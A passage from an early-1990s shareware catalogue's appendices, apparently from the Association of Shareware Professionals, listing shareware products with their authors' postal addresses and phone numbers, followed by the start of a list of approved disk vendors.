+ Orders: 0049-69-6702652 + Fax: 0049-69-676017 + Queries: 0049-6196-48524 + + Product: DIRECT MAINT, FILE PATCH, MORFORM, MORSOFT CALCULATOR, + PC SYSTEM MANAGER + MORSOFT + Address: 9859 IH-10 West, 107/811 + Orders: 800-662-0028 + Queries: 512-561-0731 + + Product: The Window BOSS & Data Clerk + Star Guidance Consulting, Inc. + Address: 273 Windy Drive, Waterbury, CN 06705 + Orders: 203-574-2449 + Fax: 203-755-8842 + Queries: 203-574-2449 + + Product: Find Area Code (FAC) + Mountain Data Systems + Address: 8531 East Dry Creek Place, Englewood, CO 80112-2701 + Orders: 303-773-9515 + Queries: 303-773-9515 + + Product: PC-STRAN(tm), PCBRIDGE(tm) + Joe Murphy + Address: P.O. Box 56164, Madison, WI 53705-9464 + Queries: 608-274-1946 + + Product: QEdit(R) Advanced + SemWare + Address: 4343 Shallowford Rd, Suite C3A, Marietta, GA + 30062-5022 + Orders: 404-641-9002 + Fax: 404-640-6213 + Queries: 404-641-9002 + + Product: JEPRS (Jeepers!) + Louis M. Miranda + Address: P.O. Box 822894, Dallas, TX 75382 + Queries: 214-522-5110 + + Appendix A, "Author addresses" 454 + + + + Product: FBNCAT, OffLoad + FBN Software + Address: P.O. Box 160867, Cupertino CA 95016 + Queries: 408-446-9039 + + Product: Systems Manager + MiCord + Address: P.O. Box 1344, Midland, MI 48640 + Orders: 517-631-4367 + Queries: 517-631-4367 + + Product: PCBUDGET + ProLogic Software + Address: P.O. Box 71 - Loveland, Ohio 45140 + Orders: 513-677-1754 + Queries: 513-677-1754 + + Product: SR-Info + Sub Rosa Publishing Inc. + Address: 1170 Sheppard Ave. W., Unit 34, Downsview, ON M3K 2A3 + Orders: 416-398-8414 + Fax: 416-398-8415 + Queries: 416-398-8414 + + Product: PC-AP Accounts Payable, PC-AR Accounts Receivable, PC-GL + General Ledger, PC-PR Payroll Writing, PCINV Invoice Writing + Medlin Accounting Shareware + Address: 1461 Sproul Avenue, Napa, CA 94559 + Orders: 707-255-4475 + Fax: 707-255-9266 + Queries: 707-255-4475 + + Product: The Retailer + RetailWare + Address: 2107 West Britton Road, Oklahoma City, OK 73120-1577 + USA + Orders: 405-749-1763 + Fax: 405-751-5629 + Queries: 405-749-1763 + + Product: DMP + DMP Software + nd + Address: 204 E. 2 Ave., Suite 610, San Mateo, CA 94401 + Fax: 415-341-2702 + Queries: 415-341-2702 + + Product: COM-AND + CABER Software + Address: P.O. Box 3607 MDSE MART, Chicago IL 60657-0607 + Orders: 310-439-6104 + Fax: 312-477-0925 + Queries: 310-439-6104 + + Appendix A, "Author addresses" 455 + + + + Product: EM Klondike, EM Poker Solitaire, EM Pyramid + EM Software + Address: Station A, P.O. Box 2052 Champaign, IL 61825-2052 + Fax: 217-367-9346 + + Product: PC-DEAL + KINDRED SPIRITS + Address: 1407 Finntown Road, Waldoboro, Maine 04572 + Orders: 800-2424-PSL + Fax: 713-524-6394 + + Product: FIELD GENERAL + rbm software + Address: 13117 Broughton Way, Austin, TX 78727-3147 + Orders: 512-388-0830 + Queries: 512-388-0830 + + Product: MegaHost + ASCII Computer Enterprises + Address: 231 Market Place #353, San Ramon, CA 94583 + Orders: 800-242-4775 #10391 + + Product: PMZIP, WinZip + Nico Mak + Address: P.O. Box 919, Bristol, CT 06011-0919 + Orders: 800-242-4775 + + Product: An Ounce Of Prevention + Pete Maclean Software + Address: P. O. Box 591359, San Francisco, CA 94159-1359 + Fax: 415-751-4635 + + Product: LiteComm(tm) for Microsoft C, LiteComm(tm) for Turbo C, + LiteSPM + Information Technology, Ltd. + Address: 5 Park Blvd., Lincoln, RI 02865 + Queries: 401-724-2730 + + Product: STS26, World Name Game, WORLD29 + Robert L. Lloyd + Address: 191 Via De La Reina, Merritt Island, FL 32953 + + Product: Balloons, DrawSome + AssistWare + Address: 1505 Sedwick Rd., Durham, NC 27713 + Orders: 919-544-5567 + Queries: 919-544-5567 + + Product: CtrlcLib, PC-FasType/CGA, PC-FasType/MONO + Trendtech Corporation + Address: P.O. Box 3687, Wayne, NJ 07474-3687 U.S.A. + Orders: 201-694-8622 + Fax: 201-694-2543 + Queries: 201-694-8622 + + Appendix A, "Author addresses" 456 + + + + Product: Dinger, Enveloper, WOPR-WinWord Office POWER Pack + Pinecliffe International + Address: Post Office Drawer 7337 - Coal Creek Canyon - Golden + CO 80403 + Orders: 800-OK-WINWORD + Queries: 303-642-0604 + + Product: Oak Hill Vi(tm) + Oak Hill Software, Inc. + Address: 73 Hillyer Circle, Middletown, NJ 07748 USA + Orders: 908-671-8544 + Queries: 908-671-8544 + + Product: LCD: Led's Change Directory, SST: the Supersonic Search + Tool + Keith Ledbetter + Address: 4240 Ketcham Drive Chesterfield, VA 23832 + Queries: 804-674-0780 + + Product: DosEA 1--For Absolute Beginners, DosEA 2--What is DOS?, + DosEA 3--10 Easy Commands, DosEA 4--Find That Command!, DosEA + 5--All About MS-DOS 5.0, DosEA 6--Switched on DOS, Hangman for + Students, Nine Men's Morris, Tear Down the Wall, The World's + Simplest Computer + Langin Software + rd + Address: 532 W. 3 St., Centralia, IL 62801 + Orders: 618-532-4899 + Fax: 618-532-0075 + Queries: 618-532-4899 + + Product: Lotto Challenger + Data Solutions + Address: 1529 Thistledown Drive, Brandon, FL 33510 + Orders: 800-783-8934 + Queries: 800-783-8934 + + Product: C.A.R.S., JDIR, Print-it + Cybernetic Software + Address: P. O. Box 3594, Skokie IL 60076 + Orders: 708-677-8358 + Fax: 708-677-8358 + Queries: 708-677-8358 + + Product: The Pool Manager + American Systems + Address: Post Office Box 604, LaGrange, IL 60525-0604 + + Product: AFFORD IT??? + Garrett Krueger Software Development + Address: P.O. Box 17037, St. Paul, MN 55117 + Orders: 612-776-9942 + Queries: 612-776-9942 + + Appendix A, "Author addresses" 457 + + + + Product: Calendar Keeper + Dataphile Software + Address: 7058 Sandpiper, Kalamazoo, MI, 49002 + Orders: 616-327-7811 + Queries: 616-327-7811 + + Product: 4Print, Babble! + Korenthal Associates, Inc. + Address: 230 West 13th Street, New York, NY 10011 + Orders: 800-KA-PROGS + Fax: 212-242-2599 + Queries: 212-242-1790 + + Product: FPLAN-Captital Needs Planner, FPLAN-Education Funding + Planner, FPLAN-Income Protection Planner, FPLAN-Personal + Financial Plnr, FPLAN-Retirement Planner + First Financial Software + Address: P.O. Box 592967, Orlando, FL 32859-2967 + Orders: 800-736-4920 + Queries: 407-352-2529 + + Product: TreeTop + Kilgore Software + Address: P.O. Box 2291, West Sacramento, CA 95691 + Orders: 800-TREETOP + Queries: 916-371-3715 + + Product: SNAP! + Walter J. Kennamer + Address: 7027 Dunstans Lane + + Product: LAN-LINK, PC-HAM, STARTREK the Computer Program, WHATS- + UP + Software for Amateur Radio + Address: POB 3419, Silver spring, MD, 20918 + Queries: 301-593 6136 + + Product: ALITE, AS-EASY-AS, DRAFT CHOICE + TRIUS, Inc. + Address: P.O. BOX 249, N. Andover, MA 01845-0249 + Orders: 800-GO-TRIUS + Fax: 508-688-6381 + Queries: 508-794-9377 + + Product: Crossword Clipper for Windows, Crossword Creator + PC HELP-LINE + Address: 35250 Silver Leaf Circle, Yucaipa, CA 92399, United + States + Orders: 714-797-3091 + Queries: 714-797-3091 + + Appendix A, "Author addresses" 458 + + + + Product: Recursive Realm + Austin Software Design + Address: P.O. Box 30133, Grand Junction, CO 81503 + Orders: 303-242-7606 + Queries: 303-242-7606 + + Product: DAYO ACCOUNTS PAYABLE (AP), DAYO ACCOUNTS RECEIVABLE + (AR), DAYO BACK ORDERS (BO), DAYO BAR CODE 3 OF 9, DAYO BILLING + & INVOICING, DAYO END OF PERIOD, DAYO GENERAL LEDGER (GL), DAYO + INDEX, DAYO INVENTORY, DAYO LITTLE POS, DAYO LOOKUP, DAYO + MEMBERSHIP, DAYO MENU, DAYO MRP, DAYO ORDER ENTRY, DAYO + PASSWORDS, DAYO PAYROLL, DAYO POS (POINT OF SALE), DAYO PRICE + BOOK, DAYO QUOTES, DAYO RENTAL POS, DAYO RETURN MANAGEMENT + SYSTEM, DAYO RETURNS & REFUNDS, DAYO SIMPLE POS, DAYO SMART + REPORTS, DAYO TIME & BILLING + TJS LAB, Inc. + Address: 5104 N. Orange Blossom Trail, #200, Orlando, FL 32810 + Orders: 407-292-4708 + Fax: 407-295-1704 + Queries: 407-291-3960 + + Product: TimeStax + Johnson Technologies + Address: 10564 N. Blaney Avenue, Cupertino, CA. 95014 + Orders: 408-255-4213 + Fax: 408-253-9994 + Queries: 408-255-4213 + + Product: VIDEOCAT + William A. Jackson + Address: 6529 Matilija Avenue, Van Nuys, CA 91401 + + Product: HyperSlide, PlotManager, SlideManager + John Intorcio + Address: 335 Washington Street, Suite 178, Woburn, MA 01880 + Orders: 617-246-9640 + Queries: 617-246-9640 + + Product: Total Investor for 1-2-3, Total Investor for Symphony + Hughes Financial Services + Address: P.O. Box 1244, Nashua, N.H. 03061-1244 + Orders: 603-598-4676 + Fax: 603-598-4676 + Queries: 603-598-4676 + + Product: ORGANIZE! Jazz Collection, ORGANIZE! Memorabilia, + ORGANIZE! Professional Books, ORGANIZE! Your Art, ORGANIZE! + Your Books/Magazines, ORGANIZE! Your CDs & Records, ORGANIZE! + Your Coin Collection, ORGANIZE! Your Comic Books, ORGANIZE! + Your Fabrics, ORGANIZE! Your Guns, ORGANIZE! Your Home, + ORGANIZE! Your Model Railroad, ORGANIZE! Your Plants/Garden, + + Appendix A, "Author addresses" 459 + + + + ORGANIZE! Your Sports Cards, ORGANIZE! Your Stamp Collection, + ORGANIZE! Your Video Tapes, Play 'n' Learn + HomeCraft Software + Address: P.O. Box 974, Tualatin, OR 97062 + Orders: 503-692-3732 + Fax: 503-692-0382 + Queries: 503-692-3732 + + Product: PullDown SAA Menu Shell + MicroDynamics Development + Address: 1445 Mensch Lane, Gilbertsville, PA 19525 + Orders: 800-2424-PSL + Queries: 215-367-1891 + + Product: "Cheque-It-Out", Takin' Care of Business! AP, Takin' + Care of Business! AR, Takin' Care of Business! GL, Takin' Care + of Business! IN, Takin' Care of Business! M&C, Takin' Care of + Business! PR, Takin' Care of Business! PS + Hooper International, Inc. + Address: P.O. Box 50200 Colorado Springs, CO 80949 + Orders: 800-245-7789 + Fax: 719-528-8997 + Queries: 719-528-8989 + + Product: WinPost + Eastern Mountain Software + Address: P.O. Box 20178, Columbus, Ohio 43220 + Queries: 614-798-0910 + + Product: SLIM + Dominic Herity + Address: PO Box 3038, Dublin 4, Ireland. + + Product: Calendar Mate + Hawk Software + Address: PO Box 3961; Regina, SK S4P 3R9; Canada + Orders: 306-543-8899 + Queries: 306-543-8899 + + Product: HDM IV - Hard Disk Menu + MicroFox Company + Address: 3310 Fox Run, P.O. Box 447, Richfield OH + 44286-0447 USA + Orders: 216-659-9489 + Queries: 216-659-9489 + + Product: Ample Notice, LQ + Granny's Old-Fashioned Software + Address: Route 4, Box 216, Boone, NC 28607 USA + Orders: 704-264-6906 + Fax: 704-264-4634 + Queries: 704-264-6906 + + Appendix A, "Author addresses" 460 + + + + Product: BookBank + Data By Design + Address: P.O. Box 31994, Charleston, SC 29417 + Orders: 803-556-0562 + Queries: 803-556-0562 + + Product: PowerBatch Compiler + CSD, Inc. + Address: P.O. Box 566484 Atlanta, GA 30356-6009 + Orders: 404-740-9583 + Fax: 404-664-0872 + Queries: 404-740-9583 + + Product: Directory Freedom, the last word + Bit Masons Consulting + Address: 3205 Windsor Ridge Dr., Westboro MA 01581 + Orders: 508-898-3321 + Queries: 508-898-3321 + + Product: ActCalendar, ActMenu, AxTrons, Circle Link, CleanUp, + DirBack, DressMeUp, Dueling Dragons, Gopher's Garden, HowTwo, + MaxMan, OutFox, Pallanda, RoDrones, Spider Web, Spin Wall, + Strudle, Super StarTrek, TiltMaze, TriAxis, Vortex + ShareGames + Address: 3174 Hawthorn St, San Diego, CA 92104 + Orders: 619-283-0472 + Queries: 619-283-0472 + + Product: MenuEase + Creative Computer + Address: 8868 Continental Dr. + Orders: 714-687-2421 + Fax: N.A. + Queries: 714-687-2421 + + Product: ENVI-MAN, FILE-MAN, LASR-MAN, MENU-MAN, PATH-MAN + Micrometric + Address: 98 Dade Avenue + Orders: 813-377-2515 + Fax: 813-377-2515 + Queries: 813-377-2515 + + Product: Flu_Shot+ + Software Concepts Design + Address: 594 Third Avenue, New York, New York 10016 + Orders: 212-889-6431 + Fax: 212-889-9730 + Queries: 212-889-6431 + + Product: FileXref, ReNamer + ConVal Software, Inc. + Address: 11607 E. Butter Creek Rd., Moorpark, CA 93021 + Orders: 805-529-6847 + Queries: 805-529-6847 + + Appendix A, "Author addresses" 461 + + + + Product: HUGO II, WHODUNIT?, HUGO'S HOUSE OF HORRORS, PRO-CR, + TOUCH TYPE TUTOR + Gray Design Associates + Address: PO Box 333, Northboro MA 01532 + Orders: 800-2424-PSL + Fax: 713-524-6398 + + Product: BlackJack!, Get Lucky! + Glencoe Computing + Address: 1100 Highway C, Glencoe MO 63038-1404 + Orders: 314-458-2863 (EVE) + Queries: 314-458-2863 (EVE) + + Product: MAXI Form, NPS - Nominal Pipe Size, Over_LAZ, Over_LAZ + PS, Utility_Belt + Herne Data Systems Ltd + Address: PO Box 250, Tiverton, ON CANADA N0G 2T0 + Orders: 519-366-2732 + Fax: 519-366-2732 + Queries: 519-366-2732 + + Product: PC-GLOSSARY + Disston Ridge, Inc. + nd + Address: 4915 22 Avenue North, St. Petersburg, FL 33710-3502 + Orders: 800-788-0787 + Fax: 813-327-0822 + Queries: 813-323-0961 + + Product: DIREDIT, HDTEST + Computer Counselors, Inc. + Address: 1515 West Montgomery Avenue, Rosemont, PA 19010 + Queries: 215-527-4408 + + Product: QFiler, QFont + Jamestown Software + Address: 2508 Valley Forge Drive, Madison WI 53719 + Orders: 608-271-2090 + Queries: 608-271-2090 + + Product: The Address Book Solution + GSF Software & Solutions + Address: 3380 Sheridan Drive, Suite 391, Amherst NY 14226 + Queries: 716-283-3804 + + Product: ACCU BBS Lister, ACCU Music Printer + Kevin Fischer + Address: 16878 Saint James Drive, Poway, CA 92064-1137 + Orders: 619-487-5461 + Queries: 619-487-5461 + + Appendix A, "Author addresses" 462 + + + + Product: EGA Mouse Paint, HouseHold TRACKER, Melissa's Music + Flashcards, Personal Time Card + Fischer Grafix & Software + Address: P.O. Box 606, Midway City, CA 92655 + Orders: 714-898-7262 + Fax: 714-898-7262 + + Product: ALBUM KEEPER II, FASTMAIL, VIDEO BUFF + CACHE MICROSYSTEMS + Address: 2234 Santa Ynez Ave, San Luis Obispo CA 93405-2144 + Queries: 805-549-0532 + + Product: dPerfect Merge + Newdorf Research + Address: P.O. Box 2309, Rancho Santa Fe, CA 92067 + Fax: 619-942-9387 + Queries: 619-942-0688 + + Product: Early Bird + Allan Computer Products + Address: PO Box 2177, Shawnee Mission, KS 66201 USA + Orders: 800-374-5725 + Fax: 913-384-3451 + Queries: 913-384-5725 + + Product: WordMaster + MasterWorks + Address: P.O. Box 116, McCleary WA 98557 + Queries: 206-495-4574 + + Product: Easy Format, Lite Format, Prgmr's Productivity Pack + Lite, Programmer's Productivity Pack + Falk Data Systems + Address: 5322 Rockwood Court, El Paso, TX 79932-2412 + Orders: 915-584-7670 + Fax: 915-584-1540 + Queries: 915-584-7670 + + Product: AntiC, ATC: Air Traffic Controller, Border, Capbuf, + CHRONOS, Ecomaster, Fictionary, GREEN, PEG, Quilt, UDECIDE, + WEBS + Cascoly Software + th + Address: 4528 36 Ave NE, Seattle, WA 98105 + Orders: 206-523-6135 + Queries: 206-523-6135 + + Product: PBMouse, PBWindows + Barry Erick + Address: 28 Ridge St ; Dallas, PA 18612 + Queries: 717-675-3432 + + Appendix A, "Author addresses" 463 + + + + Product: Q&A Study Aid + Quid Pro Quo Software + Address: P.O. Box 1248, Cedar Rapids, IA 52406-1248 + + Product: SOFF BALLS + Computater Software + Address: 2809 Lordshire Road, Madison WI 53719 + Orders: 608-271-1586 + Queries: 608-271-1586 + + Product: Bannerific, Information Please, KICK, KWIKSTAT, + KWIKWRITE, Loan Amortization, PC-CAI, Spell Games + TexaSoft + Address: P.O. Box 1169, Cedar Hill, TX 75104 + Orders: 800-955-TEXAS + Fax: 214-291-3400 + Queries: 214-291-2115 + + Product: ESF's DeskJet Fonts & Utilities, ESF's European DeskJet + Fonts, ESF's European LaserJet Fonts, ESF's LaserJet Fonts & + Util., TSR Download + Elfring Soft Fonts + Address: PO Box 61, Wasco, IL 60183 + Orders: 708-377-3520 + Fax: 708-377-6402 + Queries: 708-377-3520 + + Product: MenuDIRECT Gold, Point & Shoot Backup/Restore, Point & + Shoot Home Manager + Applied Micro Systems Technology + Address: P.O. Box 1784, Stillwater, OK 74076 + Orders: 405-377-0444 + Queries: 405-377-0444 + + Product: FileFinder, Shez + California Software Design + Address: P.O. Box 15284, Santa Rosa, CA 95402 + Orders: 707-575-9868 + + Product: WorkQueue + Lane Davis + Address: P.O.Box 1472, Laurel Springs, NJ 08021 + + Product: LOTTO PROPHET + DataMicro, Inc + Address: PO Box 3527, Port Charlotte, FL 33949 + Orders: 800-336-7720 + Fax: 813-624-2191 + Queries: 813-629-7720 + + Appendix A, "Author addresses" 464 + + + + Product: Peronal Record Keeper + Professional Automated Systems + Address: P.O. Box 129, Roosevelt, NJ 08555-0129 + Orders: 609-448-9299 + Queries: 609-448-9299 + + Product: T-Zero + Dennis Cunningham + rd + Address: No. 405, 25-6 NW 23 Pl., Portland, OR 97210-3534 + + Product: VERSAMAP + Charles H. Culberson + Address: 8 Ritter Lane, Newark, DE 19711 + Orders: 302-731-0694 + Queries: 302-731-0694 + + Product: Hearts, PCForm, Q4Tool + CareWare + Address: 10217 Ridge View Dr., Grass Valley, CA 95945 + Orders: 916-477-6024 + Queries: 916-477-6024 + + Product: PATIENCE 10 + CoCoWare - Cowles Company Software + Address: P.O. Box 122721, Fort Worth, TX, 76121-2721 + Queries: 817-249-0821 + + Product: Chris's Automobile Recorder + Cooney Applied Technology + Address: P.O. Box 2039, Kettering, OH 45429-0039 + + Product: Capital Gainz + DBLinx + Address: P.O. Box 12545, RTP, NC, 27709-2545 + Orders: 919-469-5196 + Queries: 919-469-5196 + + Product: EZ-Reader, EZ-Reader + Thumper Technologies + Address: P.O. Box 471346 + Orders: 918-355-3374 + Queries: 918-355-3374 + + Appendix A, "Author addresses" 465 + + + + Product: ActaeOn + Jon Clempner + Address: 20, Norleigh Road, Northenden, Manchester, M22 4AZ, + ENGLAND + Orders: +44-61 998 8592 + + Product: VINO:FILE Cellar Master + Mark Christian + Address: 7 Campbell Grove, East Hawthorn, 3123, Victoria, + AUSTRALIA. + Orders: 011-61-3-882-3108 + Fax: 011-61-3-882-3108 + Queries: 011-61-3-882-3108 + + Product: Plain Vanilla Labels, Rosewood Journal + Rosewood Software + Address: 135-10 Livonia Place, Scarborough, Ontario M1E 4W6 + Orders: 416-284-6119 + Queries: 416-284-6119 + + Product: PCM100.COM + Yves Charier + Address: 64 Rue de Charenton, 75012 Paris, FRANCE + Orders: 331-4340-3743 + Queries: 331-4340-3743 + + Product: EXTENDED BATCH LANGUAGE-PLUS! + Seaware Corp. + Address: P.O. Box 1656, Delray Beach, FL 33444 + Orders: 800-634-8188 + Fax: 407-738-1712 + Queries: 407-738-1712 + + Product: RIE - Rimrock Icon Editor + Rimrock Software + Address: P.O. Box 2406 Hayden, ID 83835-2406 + Orders: 208-772-9347 + Queries: 208-772-9347 + + Product: AMORTZ + Oregon Software Group + Address: 9865 SW Eagle Lane, Beaverton, OR 97005-6603 + Orders: 503-643-0915 + Fax: 503-650-0082 + Queries: 503-643-0915 + + Product: PopDBF + Bowen Software + Address: P O Box 2134, 126 Devron Circle, East Peoria IL 61611 + Orders: 800-242-4775 + Queries: 309-699-0950 + + Appendix A, "Author addresses" 466 + + + + Product: CheckMate Plus, LottoMATIC + Custom Technologies + Address: PO Box 10551, Panama City, FL 32404-1551 + Orders: 800-541-6234 + Fax: 904-871-5479 X33 + Queries: 904-871-5479 + + Product: VMiX 386 + Commercial Software Associates (ComSoft) + Address: P.O. Box 36 Corona del Mar, CA 92625 + Queries: 714-720-1214 + + Product: TAX91 + F. Roland Bjorklund + Address: P.O. Box 1156, Bryans Road, MD 20616 + Queries: 301-645-6819 + + Product: BOOKLET, BOOKLET-SCREEN, Smart10 + Sympathetic Software + Address: 9531 Telhan Drive, Huntington Beach, CA 92646 + + Product: ICP + Spirit7 Software, Ltd. + Address: PO Box 777/ Waynesboro, VA 22980 + Orders: 703-943-4635 + Fax: 703-943-4635 + Queries: 703-943-4635 + + Product: DB2DOC, DB2PRG, QQUERY (All Fox versions), QQUERY + (FoxBASE+ 2.10 version), QQUERY (FoxPro 1.02 version), QQUERY + (FoxPro 2.0 version) + Carlos Berguido + Address: 1722 Capella Court - Petaluma, CA 94954 + Orders: 707-762-9067 + Queries: 707-762-9067 + + Product: FASTFILE + Interactive Mini Systems, Inc. + Address: 5312 W Tucannon, Kennewick, WA 99336 + Orders: 509-783-3829 + Queries: 509-783-3829 + + Product: Rubicon Publisher + Rubicon Computer Labs Inc. + Address: Box 336, Chelsea, QC, Canada J0X 1N0 + Orders: 819-770-4317 + Fax: 819-770-4317 + Queries: 819-770-4317 + + Product: Newkey + FAB Software + Address: P.O. Box 336, Wayland, MA 01778 + Orders: 508-358-6357 + Queries: 508-358-6357 + + Appendix A, "Author addresses" 467 + + + + Product: Hard Disk Director + Canyon Software + Address: 1537 Fourth Street, suite 131, San Rafael, CA 94901 + Orders: 415-453-9779 + Fax: 415-459-4904 + Queries: 415-453-9779 + + Product: DISKLIST, SHERLOCK + Gulf Sierra + Address: 14809 Clavel Street, Rockville, MD 20853-1543 + Orders: 301-460-0354 + Queries: 301-460-0354 + + Product: FOURU, Little Black Book, LK4.EXE, LOGGIT + GTX Software + Address: 5419 Dahlia Drive, Los Angeles, CA 90041 + Orders: 213-257-2704 + Queries: 213-257-2704 + + Product: ALPS, ALPS(PC), Architectural Engineering, Complement & + Schedules, Complement & Schedules(PC), Custodial Requirements, + Custodial Requirements(PC), Decision Analysis, Decision + Analysis(PC), EE, Flow Process, Flow Process(PC), Furniture & + Equipment Survey, Furniture, Equipment Survey(PC), Graphical + Representation, Graphical Representation(PC), Layout Planning, + Layout Planning(PC), Man/machine Process, Man/Machine + Process(PC), Methods Time Measurement, Methods Time + Merasurement(PC), Operation Process, Operation Process(PC), + Operator Process, Operator Process(PC), Overhead Cost, Overhead + Cost(PC), Space Relationship, Space Relationship(PC), + Statistical, Statistical(PC), Value Engineering, Value + Engineering(PC), Volume,Hours & Productivity(PC), Volume,Hours + & Productivity + ALPS Software + Address: 1821 Elm Ave., Canon City, CO 81212-4524 + Orders: 800-242-4PSL + Fax: 713-524-6398 + Queries: 719-269-1117 + + Product: Plot-Line + PlotSoft Solutions + Address: RR#4 Shelburne Ontario Canada L0N 1S8 + Orders: 519-925-5468 + Fax: 519-942-3241 + Queries: 519-925-5468 + + Appendix A, "Author addresses" 468 + + + + Product: Cipher, Cipher for Windows, EGATrek, Mah + Jongg--Solitaire, MouseTools, Shooting Gallery, SuperFly + Arcanum Computing + Address: 92 Bishop Drive, Framingham, MA 01701-6515 + + Product: Fantasy, GEMCAP, PC-Draft II, PC-Draft-CAD + Natural Software + Address: 19 South Fifth Street, St. Charles, IL 60174 + Orders: 708-377-7320 + Queries: 708-377-7320 + + Product: TechnoJock's Object Toolkit, TechnoJock's Turbo Toolkit + TechnoJock Software, Inc. + Address: PO Box 820927, Houston TX 77282 + Orders: 800-242 4775 + Fax: 713-493 5872 + Queries: 713-493 6354 + + Product: Attribution, Backup, Backup/2, Changer/2, Director, + Dupes, Except, Getkey/2, Globally, Globally/2, Launcher, Maker, + Mover, Renamer, Renamer/2, Room, Shredder/2, Stamper, + Stringer/2 + Richard W. Adams + Address: 104 Willow Oaks Boulevard, Hampton, VA 23669-1528 + Orders: 804-851-5263 + + Product: BOXER(tm) Text Editing System + BOXER Software + Address: P.O. Box 3230, Peterborough, NH 03458-3230 + Orders: 800-982-6937 + Queries: 603-924-6602 + + Product: CATALOG-ON-A-DISK, DARN! Don't Forget!, Programmer's + SUPER-MAINT + EmmaSoft + Address: PO Box 238 Lansing, NY 14882-0238 + Orders: 607-533-4685 + Fax: 607-533-4685 + Queries: 607-533-4685 + + Product: ProDev*EPRICE, ProDev*MEMBER, ProDev*QUOTE, ProDev*QUOTE + Utility Programs + Pro Dev Software + Address: 545 Grover Road, Muskegon MI 49442-9427 + Orders: 616-788-2243 + Queries: 616-788-2243 + + Product: Disk Manager (CUDM), Duplicate File Manager + Micro System Solutions + Address: 5048 W Maplewood Ave, Littleton CO 80123 + Orders: 800-421-1789 + Queries: 303-795-7653 + + Appendix A, "Author addresses" 469 + + + + Product: Personal Calendar (PC) for DOS + FunStuff Software (Paul Munoz-Colman) + Address: 11645 Charter Oak Ct., Suite 201, Reston, VA + 22090-4526 + Orders: 800-242-4775 + Fax: 703-435-3130 + Queries: 703-435-1110 + + Product: PCCLOCK + Michael J. Sadaway + Address: Box 128-P, South Walpole, MA 02071 + + Product: Disk DUP, FormGen, FormGen Business Collection, FormGen + Fill, FormGen Home Collection, FormGen Utility Pak #1 + FormGen Corp. + Address: 13 Holland Drive, Bolton, ON, Canada L7E 1G4 + Orders: 416-857-4141 + Fax: 416-857-4531 + Queries: 416-857-4141 + + Product: 4Shell for Windows, dbDIAL(tm), GRAB Plus(r), GRAB + Plus(r) for Windows, ZPAY 3 + ZPAY Payroll Systems, Inc. (Paul Mayer) + th + Address: 2526 69 Avenue South, St. Petersburg, FL 33712-5631 + Orders: 800-468-4188 + Fax: 813-866-8034 + Queries: 813-866-8233 + + Product: FLEXIBAK Plus + Nildram Software + Address: 26 Stanley Hill Avenue, Amersham, Bucks HP7 9BD + UNITED KINGDOM + Orders: 708-397-1221 + Fax: 708-397-0381 + Queries: 708-397-1221 + + Product: PrintPlus + Lambert Klein + Address: PO Box 611 Wayne MI 48184 + Orders: 800-622-2793 + Fax: 708-397-0381 + Queries: 708-397-1221 + + Product: PCFDial, Qanalyst + Barn Owl Software + Address: P.O. Box 74, O'Fallon, IL 62269 + Orders: 800-788-0787 + Fax: 618-632-2339 + Queries: 618-632-7345 + + Product: Approved Vendor Requirements, ASP BBS Membership + Application, ASP Catalog for BBSs, ASP Catalog for CompuServe, + ASP Catalog for GEnie, ASP List of Approved BBSs, ASP List of + + Appendix A, "Author addresses" 470 + + + + Approved Vendors, How to join as a "beta" author, IBM PC Author + Application, Information about copyrights, MacIntosh Author + Application + Association of Shareware Professionals + Address: 545 Grover Rd., Muskegon MI 49442 + Fax: 616-788-2765 + Queries: 616-788-5131 + + Appendix B, "Vendor addresses" 471 + + + + + + Appendix B + Vendor addresses + + This appendix lists each ASP-approved disk vendor. These + vendors have agreed to abide by ethical standards when offering + shareware. + + + $ave On $oftware + Address: PO Box 2837, Wilkes Barre PA 18703 + Phone: 717-824-5452 + + A & J Office Services + Address: 49 COLLINGS ST, PEARCE ACT 2607 AUSTRALIA + Phone: 06 2902225 + + A Drive Software + Address: 7 WATERLOO ROAD, WOODBRIDGE W.A. 6168 AUSTRALIA + Phone: 61-9-592-2624 + + AAT Computer Services + Address: 7 DAYAN DRIVE, WANTIRNA SOUTH VICTORIA 3152 AUSTRALIA + Phone: 011 61 3-8012428 + + AB Club + Address: 13 rue Lacordaire, PARIS 75015 FRANCE + Phone: 33-1-6933-7000 + + Accusoft + Address: 14761 PEARL ROAD STE 309, STRONGSVILLE OH 44136 + Phone: 916-225-2340 + + ACL Shareware + Address: 1601 fulton ave #10, SACRAMENTO CA 95825 + Phone: 916-973-1850 + + Adams Computer Sales + Address: 7322 AVALON DR., FAYETTEVILLE NC 28303-2419 + Phone: 919-867-6181 + + Advantage + Address: 56 BATH ROAD, GLOUCESTERSHIRE GL53 7HJ ENGLAND + Phone: 0242-224340 + + Advantage Plus Distributors + Address: 7113 HALIFAX COURT, TAMPA FL 33615 + Phone: 813-885-1478 + + Affordable Software + Address: 21 BLAXLAND STREET, PO BOX 472, MATRAVILLE NSW 2036 + AUSTRALIA + Phone: 02-311-3539 + + Appendix B, "Vendor addresses" 472 + + + + Affordable Solutions + Address: 3379 AZTEC RD #24C, DORAVILLE GA 30340 + Phone: 404-728-2673 + + Airline Computer Supplies + Address: 869 E SCHAUMBURG RD SUITE 200, SCHAUMBURG IL 60194 + Phone: 708-619-8182 + + Alamo Software + Address: 4102 ROLAND AVENUE, SAN ANTONIO TX 78222 + Phone: 512-333-1144 + + Alphon Edugames + Address: 221 RIDLEY ROAD, BRIDGEMAN DOWNS QLD 4035 AUSTRALIA + Phone: 011 61 72632744 + + Alternative Personal Software + Address: 269 Springside Drive Ste C, HAMILTON ON L9B 1P8 CANADA + Phone: 416-577-4068 + + Andromeda Software, Inc + Address: PO BOX 605, AMHERST NY 14226-0605 + Phone: 716-691-4510 + + Arnold Company + Address: HWY 1528, RTE 2, BLDG 231, COOPER TX 75432 + Phone: 903-395-2922 + + Barbara's Choice + Address: 44211 20TH ST WEST, LANCASTER CA 93534 + Phone: 805-949-1037 + + Bear Ware + Address: PO BOX 11603, MARINA DEL REY CA 90295 + Phone: 213-822-1376 + + Bee Software Publishing, Inc. + Address: 240 HIGHLAND ST, PO BOX 1179, HAMMOND IN 46320 + Phone: 219-931-3761 + + Best Bits & Bytes + Address: PO Box 8245, Van Nuys CA 91409 + Phone: 818-764-9503 + + Big Byte Software + Address: 2111 W ARKANSAS LANE #207, ARLINGTON TX 76013 + Phone: 817-265-2007 + + BME Bernhard Marugg + Address: TREPPENWEG 19, ENNETTURGI CH-5300 SWITZERLAND + Phone: 41 56 281075 + + Appendix B, "Vendor addresses" 473 + + + + Bonware + Address: PINE-MAPLE STREET, PO 